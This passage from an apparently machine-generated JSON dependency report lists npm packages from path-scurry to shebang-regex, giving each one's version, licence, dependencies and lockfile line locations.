"PURL": "pkg:npm/path-scurry@1.11.1", "UID": "f15c8defba55e272" }, "Version": "1.11.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@10.4.3", "minipass@7.1.3" ], "Locations": [ { "StartLine": 7697, "EndLine": 7712 } ], "AnalyzedBy": "npm" }, { "ID": "path-to-regexp@0.1.13", "Name": "path-to-regexp", "Identifier": { "PURL": "pkg:npm/path-to-regexp@0.1.13", "UID": "c16fd53d5cb00ad1" }, "Version": "0.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7719, "EndLine": 7724 } ], "AnalyzedBy": "npm" }, { "ID": "peberminta@0.9.0", "Name": "peberminta", "Identifier": { "PURL": "pkg:npm/peberminta@0.9.0", "UID": "f4de49b780f87831" }, "Version": "0.9.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7742, "EndLine": 7750 } ], "AnalyzedBy": "npm" }, { "ID": "picocolors@1.1.1", "Name": "picocolors", "Identifier": { "PURL": "pkg:npm/picocolors@1.1.1", "UID": "d306ee73db806073" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7751, "EndLine": 7756 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@2.3.2", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@2.3.2", "UID": "97d39b7f6f0108b4" }, "Version": "2.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7757, "EndLine": 7768 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@4.0.4", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@4.0.4", "UID": "160046dedbc75743" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9682, "EndLine": 9693 } ], "AnalyzedBy": "npm" }, { "ID": "pify@2.3.0", "Name": "pify", "Identifier": { "PURL": "pkg:npm/pify@2.3.0", "UID": "b2815c7b3263e1df" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7769, "EndLine": 7777 } ], "AnalyzedBy": "npm" }, { "ID": "pirates@4.0.7", "Name": "pirates", "Identifier": { "PURL": "pkg:npm/pirates@4.0.7", "UID": "930ee0fad2fbb238" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7778, "EndLine": 7786 } ], "AnalyzedBy": "npm" }, { "ID": "png-js@2.0.0", "Name": "png-js", "Identifier": { "PURL": "pkg:npm/png-js@2.0.0", "UID": "7e6d8bc79925c63d" }, "Version": "2.0.0", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fflate@0.8.2" ], "Locations": [ { "StartLine": 7806, "EndLine": 7813 } ], "AnalyzedBy": "npm" }, { "ID": "pngjs@5.0.0", "Name": "pngjs", "Identifier": { "PURL": "pkg:npm/pngjs@5.0.0", "UID": "5593c4131fbd0f80" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7814, "EndLine": 7822 } ], "AnalyzedBy": "npm" }, { "ID": "postcss@8.4.31", "Name": "postcss", "Identifier": { "PURL": "pkg:npm/postcss@8.4.31", "UID": "d845910d063cee9a" }, "Version": "8.4.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11", "picocolors@1.1.1", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 7291, "EndLine": 7318 } ], "AnalyzedBy": "npm" }, { "ID": "postcss@8.5.12", "Name": "postcss", "Identifier": { "PURL": "pkg:npm/postcss@8.5.12", "UID": "535592c99142efd2" }, "Version": "8.5.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11", "picocolors@1.1.1", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 7823, "EndLine": 7850 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-import@15.1.0", "Name": "postcss-import", "Identifier": { "PURL": "pkg:npm/postcss-import@15.1.0", "UID": "a40e4ea455a32a53" }, "Version": "15.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-value-parser@4.2.0", "postcss@8.5.12", "read-cache@1.0.0", "resolve@1.22.12" ], "Locations": [ { "StartLine": 7851, "EndLine": 7867 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-js@4.1.0", "Name": "postcss-js", "Identifier": { "PURL": "pkg:npm/postcss-js@4.1.0", "UID": "517b0f5f19d88c6b" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase-css@2.0.1", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7868, "EndLine": 7892 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-load-config@6.0.1", "Name": "postcss-load-config", "Identifier": { "PURL": "pkg:npm/postcss-load-config@6.0.1", "UID": "d632112d3a54eee1" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jiti@1.21.7", "lilconfig@3.1.3", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7893, "EndLine": 7934 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-nested@6.2.0", "Name": "postcss-nested", "Identifier": { "PURL": "pkg:npm/postcss-nested@6.2.0", "UID": "2cc4c040c67a0164" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-selector-parser@6.1.2", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7935, "EndLine": 7959 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-selector-parser@6.1.2", "Name": "postcss-selector-parser", "Identifier": { "PURL": "pkg:npm/postcss-selector-parser@6.1.2", "UID": "4842c6bff457ee5e" }, "Version": "6.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cssesc@3.0.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 7960, "EndLine": 7972 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-value-parser@4.2.0", "Name": "postcss-value-parser", "Identifier": { "PURL": "pkg:npm/postcss-value-parser@4.2.0", "UID": "2646489e5a59881d" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7973, "EndLine": 7978 } ], "AnalyzedBy": "npm" }, { "ID": "prisma@5.22.0", "Name": "prisma", "Identifier": { "PURL": "pkg:npm/prisma@5.22.0", "UID": "e77327102255ddf5" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/engines@5.22.0", "fsevents@2.3.3" ], "Locations": [ { "StartLine": 8040, "EndLine": 8059 } ], "AnalyzedBy": "npm" }, { "ID": "process-nextick-args@2.0.1", "Name": "process-nextick-args", "Identifier": { "PURL": "pkg:npm/process-nextick-args@2.0.1", "UID": "f076343c63c6dabd" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8060, "EndLine": 8065 } ], "AnalyzedBy": "npm" }, { "ID": "prop-types@15.8.1", "Name": "prop-types", "Identifier": { "PURL": "pkg:npm/prop-types@15.8.1", "UID": "7529228c6b1b00a9" }, "Version": "15.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1", "react-is@16.13.1" ], "Locations": [ { "StartLine": 8066, "EndLine": 8076 } ], "AnalyzedBy": "npm" }, { "ID": "proto-list@1.2.4", "Name": "proto-list", "Identifier": { "PURL": "pkg:npm/proto-list@1.2.4", "UID": "889223fc7d49a084" }, "Version": "1.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8077, "EndLine": 8082 } ], "AnalyzedBy": "npm" }, { "ID": "proto3-json-serializer@2.0.2", "Name": "proto3-json-serializer", "Identifier": { "PURL": "pkg:npm/proto3-json-serializer@2.0.2", "UID": "2489bec9a4b29c7f" }, "Version": "2.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "protobufjs@7.5.6" ], "Locations": [ { "StartLine": 8083, "EndLine": 8095 } ], "AnalyzedBy": "npm" }, { "ID": "protobufjs@7.5.6", "Name": "protobufjs", "Identifier": { "PURL": "pkg:npm/protobufjs@7.5.6", "UID": "11481e02f6a2a6cd" }, "Version": "7.5.6", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/base64@1.1.2", "@protobufjs/codegen@2.0.5", "@protobufjs/eventemitter@1.1.0", "@protobufjs/fetch@1.1.0", "@protobufjs/float@1.0.2", "@protobufjs/inquire@1.1.1", "@protobufjs/path@1.1.2", "@protobufjs/pool@1.1.0", "@protobufjs/utf8@1.1.1", "@types/node@20.19.39", "long@5.3.2" ], "Locations": [ { "StartLine": 8096, "EndLine": 8120 } ], "AnalyzedBy": "npm" }, { "ID": "proxy-addr@2.0.7", "Name": "proxy-addr", "Identifier": { "PURL": "pkg:npm/proxy-addr@2.0.7", "UID": "96f353fc63269ff0" }, "Version": "2.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "forwarded@0.2.0", "ipaddr.js@1.9.1" ], "Locations": [ { "StartLine": 8121, "EndLine": 8133 } ], "AnalyzedBy": "npm" }, { "ID": "proxy-from-env@2.1.0", "Name": "proxy-from-env", "Identifier": { "PURL": "pkg:npm/proxy-from-env@2.1.0", "UID": "d996917dc6b72e1a" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8134, "EndLine": 8142 } ], "AnalyzedBy": "npm" }, { "ID": "qrcode@1.5.4", "Name": "qrcode", "Identifier": { "PURL": "pkg:npm/qrcode@1.5.4", "UID": "adf208b067bb5d3c" }, "Version": "1.5.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dijkstrajs@1.0.3", "pngjs@5.0.0", "yargs@15.4.1" ], "Locations": [ { "StartLine": 8153, "EndLine": 8169 } ], "AnalyzedBy": "npm" }, { "ID": "qs@6.14.2", "Name": "qs", "Identifier": { "PURL": "pkg:npm/qs@6.14.2", "UID": "b18f6a32836a94eb" }, "Version": "6.14.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "side-channel@1.1.0" ], "Locations": [ { "StartLine": 8288, "EndLine": 8302 } ], "AnalyzedBy": "npm" }, { "ID": "qs@6.15.1", "Name": "qs", "Identifier": { "PURL": "pkg:npm/qs@6.15.1", "UID": "ae5aae433573a79c" }, "Version": "6.15.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "side-channel@1.1.0" ], "Locations": [ { "StartLine": 3715, "EndLine": 3729 } ], "AnalyzedBy": "npm" }, { "ID": "queue@6.0.2", "Name": "queue", "Identifier": { "PURL": "pkg:npm/queue@6.0.2", "UID": "9461b2f66f3a05b8" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4" ], "Locations": [ { "StartLine": 8303, "EndLine": 8311 } ], "AnalyzedBy": "npm" }, { "ID": "queue-microtask@1.2.3", "Name": "queue-microtask", "Identifier": { "PURL": "pkg:npm/queue-microtask@1.2.3", "UID": "28d00321bca14ebf" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8312, "EndLine": 8331 } ], "AnalyzedBy": "npm" }, { "ID": "range-parser@1.2.1", "Name": "range-parser", "Identifier": { "PURL": "pkg:npm/range-parser@1.2.1", "UID": "720352a7122141fb" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8332, "EndLine": 8340 } ], "AnalyzedBy": "npm" }, { "ID": "raw-body@2.5.3", "Name": "raw-body", "Identifier": { "PURL": "pkg:npm/raw-body@2.5.3", "UID": "5c4b35e29172ff4e" }, "Version": "2.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "http-errors@2.0.1", "iconv-lite@0.4.24", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 8341, "EndLine": 8355 } ], "AnalyzedBy": "npm" }, { "ID": "react@18.3.1", "Name": "react", "Identifier": { "PURL": "pkg:npm/react@18.3.1", "UID": "793508ad6ccd2094" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 8356, "EndLine": 8367 } ], "AnalyzedBy": "npm" }, { "ID": "react-dom@18.3.1", "Name": "react-dom", "Identifier": { "PURL": "pkg:npm/react-dom@18.3.1", "UID": "ca45acb3cd7983fe" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "react@18.3.1", "scheduler@0.23.2" ], "Locations": [ { "StartLine": 8368, "EndLine": 8380 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@16.13.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@16.13.1", "UID": "d46eb836f2747e92" }, "Version": "16.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8390, "EndLine": 8395 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@18.3.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@18.3.1", "UID": "47328d916cb951e1" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8033, "EndLine": 8039 }, { "StartLine": 8510, "EndLine": 8515 } ], "AnalyzedBy": "npm" }, { "ID": "react-promise-suspense@0.3.4", "Name": "react-promise-suspense", "Identifier": { "PURL": "pkg:npm/react-promise-suspense@0.3.4", "UID": "dde24a9cbdc13dba" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fast-deep-equal@2.0.1" ], "Locations": [ { "StartLine": 8396, "EndLine": 8404 } ], "AnalyzedBy": "npm" }, { "ID": "react-smooth@4.0.4", "Name": "react-smooth", "Identifier": { "PURL": "pkg:npm/react-smooth@4.0.4", "UID": "4e47c4b221842e28" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fast-equals@5.4.0", "prop-types@15.8.1", "react-dom@18.3.1", "react-transition-group@4.4.5", "react@18.3.1" ], "Locations": [ { "StartLine": 8411, "EndLine": 8425 } ], "AnalyzedBy": "npm" }, { "ID": "react-transition-group@4.4.5", "Name": "react-transition-group", "Identifier": { "PURL": "pkg:npm/react-transition-group@4.4.5", "UID": "c79ba97e675a2336" }, "Version": "4.4.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "dom-helpers@5.2.1", "loose-envify@1.4.0", "prop-types@15.8.1", "react-dom@18.3.1", "react@18.3.1" ], "Locations": [ { "StartLine": 8426, "EndLine": 8441 } ], "AnalyzedBy": "npm" }, { "ID": "read-cache@1.0.0", "Name": "read-cache", "Identifier": { "PURL": "pkg:npm/read-cache@1.0.0", "UID": "ff091ef4068a0683" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pify@2.3.0" ], "Locations": [ { "StartLine": 8442, "EndLine": 8450 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@2.3.8", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@2.3.8", "UID": "e00c9bd04395a62f" }, "Version": "2.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-util-is@1.0.3", "inherits@2.0.4", "isarray@1.0.0", "process-nextick-args@2.0.1", "safe-buffer@5.1.2", "string_decoder@1.1.1", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 4137, "EndLine": 4151 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@3.6.2", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@3.6.2", "UID": "ae61642956b90123" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 8451, "EndLine": 8465 } ], "AnalyzedBy": "npm" }, { "ID": "readdirp@3.6.0", "Name": "readdirp", "Identifier": { "PURL": "pkg:npm/readdirp@3.6.0", "UID": "dbfcb09e9403c137" }, "Version": "3.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picomatch@2.3.2" ], "Locations": [ { "StartLine": 8466, "EndLine": 8477 } ], "AnalyzedBy": "npm" }, { "ID": "recharts@2.15.4", "Name": "recharts", "Identifier": { "PURL": "pkg:npm/recharts@2.15.4", "UID": "17670f06bc38f173" }, "Version": "2.15.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "clsx@2.1.1", "eventemitter3@4.0.7", "lodash@4.18.1", "react-dom@18.3.1", "react-is@18.3.1", "react-smooth@4.0.4", "react@18.3.1", "recharts-scale@0.4.5", "tiny-invariant@1.3.3", "victory-vendor@36.9.2" ], "Locations": [ { "StartLine": 8478, "EndLine": 8500 } ], "AnalyzedBy": "npm" }, { "ID": "recharts-scale@0.4.5", "Name": "recharts-scale", "Identifier": { "PURL": "pkg:npm/recharts-scale@0.4.5", "UID": "40055d5e399deaa2" }, "Version": "0.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decimal.js-light@2.5.1" ], "Locations": [ { "StartLine": 8501, "EndLine": 8509 } ], "AnalyzedBy": "npm" }, { "ID": "redis-errors@1.2.0", "Name": "redis-errors", "Identifier": { "PURL": "pkg:npm/redis-errors@1.2.0", "UID": "7bdce8edd9554f41" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8516, "EndLine": 8524 } ], "AnalyzedBy": "npm" }, { "ID": "redis-parser@3.0.0", "Name": "redis-parser", "Identifier": { "PURL": "pkg:npm/redis-parser@3.0.0", "UID": "1a2c0645670033df" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "redis-errors@1.2.0" ], "Locations": [ { "StartLine": 8525, "EndLine": 8536 } ], "AnalyzedBy": "npm" }, { "ID": "require-directory@2.1.1", "Name": "require-directory", "Identifier": { "PURL": "pkg:npm/require-directory@2.1.1", "UID": "800db78158ed0a22" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8537, "EndLine": 8545 } ], "AnalyzedBy": "npm" }, { "ID": "require-from-string@2.0.2", "Name": "require-from-string", "Identifier": { "PURL": "pkg:npm/require-from-string@2.0.2", "UID": "5d3d6dd74419d318" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8546, "EndLine": 8554 } ], "AnalyzedBy": "npm" }, { "ID": "require-main-filename@2.0.0", "Name": "require-main-filename", "Identifier": { "PURL": "pkg:npm/require-main-filename@2.0.0", "UID": "886b34fc9a110322" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8555, "EndLine": 8560 } ], "AnalyzedBy": "npm" }, { "ID": "resend@3.5.0", "Name": "resend", "Identifier": { "PURL": "pkg:npm/resend@3.5.0", "UID": "535e5f3d1ff29249" }, "Version": "3.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-email/render@0.0.16" ], "Locations": [ { "StartLine": 8561, "EndLine": 8572 } ], "AnalyzedBy": "npm" }, { "ID": "resolve@1.22.12", "Name": "resolve", "Identifier": { "PURL": "pkg:npm/resolve@1.22.12", "UID": "573854130da77949" }, "Version": "1.22.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "is-core-module@2.16.1", "path-parse@1.0.7", "supports-preserve-symlinks-flag@1.0.0" ], "Locations": [ { "StartLine": 8573, "EndLine": 8593 } ], "AnalyzedBy": "npm" }, { "ID": "restructure@3.0.2", "Name": "restructure", "Identifier": { "PURL": "pkg:npm/restructure@3.0.2", "UID": "b3be3037e1f803f8" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8604, "EndLine": 8609 } ], "AnalyzedBy": "npm" }, { "ID": "retry@0.13.1", "Name": "retry", "Identifier": { "PURL": "pkg:npm/retry@0.13.1", "UID": "3b1fcacbd76c6cba" }, "Version": "0.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8610, "EndLine": 8619 } ], "AnalyzedBy": "npm" }, { "ID": "retry-request@7.0.2", "Name": "retry-request", "Identifier": { "PURL": "pkg:npm/retry-request@7.0.2", "UID": "530b3a2a3e94600a" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/request@2.48.13", "extend@3.0.2", "teeny-request@9.0.0" ], "Locations": [ { "StartLine": 8620, "EndLine": 8634 } ], "AnalyzedBy": "npm" }, { "ID": "reusify@1.1.0", "Name": "reusify", "Identifier": { "PURL": "pkg:npm/reusify@1.1.0", "UID": "70c45a775b720075" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8635, "EndLine": 8644 } ], "AnalyzedBy": "npm" }, { "ID": "run-parallel@1.2.0", "Name": "run-parallel", "Identifier": { "PURL": "pkg:npm/run-parallel@1.2.0", "UID": "e1f8c74c7b06a03" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue-microtask@1.2.3" ], "Locations": [ { "StartLine": 8714, "EndLine": 8736 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.1.2", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.1.2", "UID": "43360a99339ebc90" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3633, "EndLine": 3638 }, { "StartLine": 4152, "EndLine": 4157 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.2.1", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.2.1", "UID": "a2e193612bf00f88" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8737, "EndLine": 8756 } ], "AnalyzedBy": "npm" }, { "ID": "safer-buffer@2.1.2", "Name": "safer-buffer", "Identifier": { "PURL": "pkg:npm/safer-buffer@2.1.2", "UID": "77eabef94235401" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8757, "EndLine": 8762 } ], "AnalyzedBy": "npm" }, { "ID": "scheduler@0.17.0", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.17.0", "UID": "30c71d60806180e0" }, "Version": "0.17.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1" ], "Locations": [ { "StartLine": 8763, "EndLine": 8772 } ], "AnalyzedBy": "npm" }, { "ID": "scheduler@0.23.2", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.23.2", "UID": "fe4a6eb21e3bff16" }, "Version": "0.23.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 8381, "EndLine": 8389 } ], "AnalyzedBy": "npm" }, { "ID": "scmp@2.1.0", "Name": "scmp", "Identifier": { "PURL": "pkg:npm/scmp@2.1.0", "UID": "ea9208c83d16449" }, "Version": "2.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8773, "EndLine": 8779 } ], "AnalyzedBy": "npm" }, { "ID": "selderee@0.11.0", "Name": "selderee", "Identifier": { "PURL": "pkg:npm/selderee@0.11.0", "UID": "19d1b29e508265a8" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "parseley@0.12.1" ], "Locations": [ { "StartLine": 8780, "EndLine": 8791 } ], "AnalyzedBy": "npm" }, { "ID": "semver@7.7.4", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.4", "UID": "ebcfd7f07a127e71" }, "Version": "7.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8792, "EndLine": 8803 } ], "AnalyzedBy": "npm" }, { "ID": "send@0.19.2", "Name": "send", "Identifier": { "PURL": "pkg:npm/send@0.19.2", "UID": "aaf843f833d5e23b" }, "Version": "0.19.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "encodeurl@2.0.0", "escape-html@1.0.3", "etag@1.8.1", "fresh@0.5.2", "http-errors@2.0.1", "mime@1.6.0", "ms@2.1.3", "on-finished@2.4.1", "range-parser@1.2.1", "statuses@2.0.2" ], "Locations": [ { "StartLine": 8804, "EndLine": 8827 } ], "AnalyzedBy": "npm" }, { "ID": "serve-static@1.16.3", "Name": "serve-static", "Identifier": { "PURL": "pkg:npm/serve-static@1.16.3", "UID": "bcee96944df5cb0" }, "Version": "1.16.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encodeurl@2.0.0", "escape-html@1.0.3", "parseurl@1.3.3", "send@0.19.2" ], "Locations": [ { "StartLine": 8855, "EndLine": 8869 } ], "AnalyzedBy": "npm" }, { "ID": "set-blocking@2.0.0", "Name": "set-blocking", "Identifier": { "PURL": "pkg:npm/set-blocking@2.0.0", "UID": "c44ff1c584396267" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8870, "EndLine": 8875 } ], "AnalyzedBy": "npm" }, { "ID": "setprototypeof@1.2.0", "Name": "setprototypeof", "Identifier": { "PURL": "pkg:npm/setprototypeof@1.2.0", "UID": "cff36d3bd50cb3aa" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8876, "EndLine": 8881 } ], "AnalyzedBy": "npm" }, { "ID": "sharp@0.34.5", "Name": "sharp", "Identifier": { "PURL": "pkg:npm/sharp@0.34.5", "UID": "c0fc6fee91fa41bd" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/colour@1.1.0", "@img/sharp-darwin-arm64@0.34.5", "@img/sharp-darwin-x64@0.34.5", "@img/sharp-libvips-darwin-arm64@1.2.4", "@img/sharp-libvips-darwin-x64@1.2.4", "@img/sharp-libvips-linux-arm64@1.2.4", "@img/sharp-libvips-linux-arm@1.2.4", "@img/sharp-libvips-linux-ppc64@1.2.4", "@img/sharp-libvips-linux-riscv64@1.2.4", "@img/sharp-libvips-linux-s390x@1.2.4", "@img/sharp-libvips-linux-x64@1.2.4", "@img/sharp-libvips-linuxmusl-arm64@1.2.4", "@img/sharp-libvips-linuxmusl-x64@1.2.4", "@img/sharp-linux-arm64@0.34.5", "@img/sharp-linux-arm@0.34.5", "@img/sharp-linux-ppc64@0.34.5", "@img/sharp-linux-riscv64@0.34.5", "@img/sharp-linux-s390x@0.34.5", "@img/sharp-linux-x64@0.34.5", "@img/sharp-linuxmusl-arm64@0.34.5", "@img/sharp-linuxmusl-x64@0.34.5", "@img/sharp-wasm32@0.34.5", "@img/sharp-win32-arm64@0.34.5", "@img/sharp-win32-ia32@0.34.5", "@img/sharp-win32-x64@0.34.5", "detect-libc@2.1.2", "semver@7.7.4" ], "Locations": [ { "StartLine": 8882, "EndLine": 8924 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-command@2.0.0", "Name": "shebang-command", "Identifier": { "PURL": "pkg:npm/shebang-command@2.0.0", "UID": "e7ea01266a89c919" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shebang-regex@3.0.0" ], "Locations": [ { "StartLine": 8925, "EndLine": 8936 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-regex@3.0.0", "Name": "shebang-regex", "Identifier": { "PURL": "pkg:npm/shebang-regex@3.0.0", "UID": "c0d20708c9d67231" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": 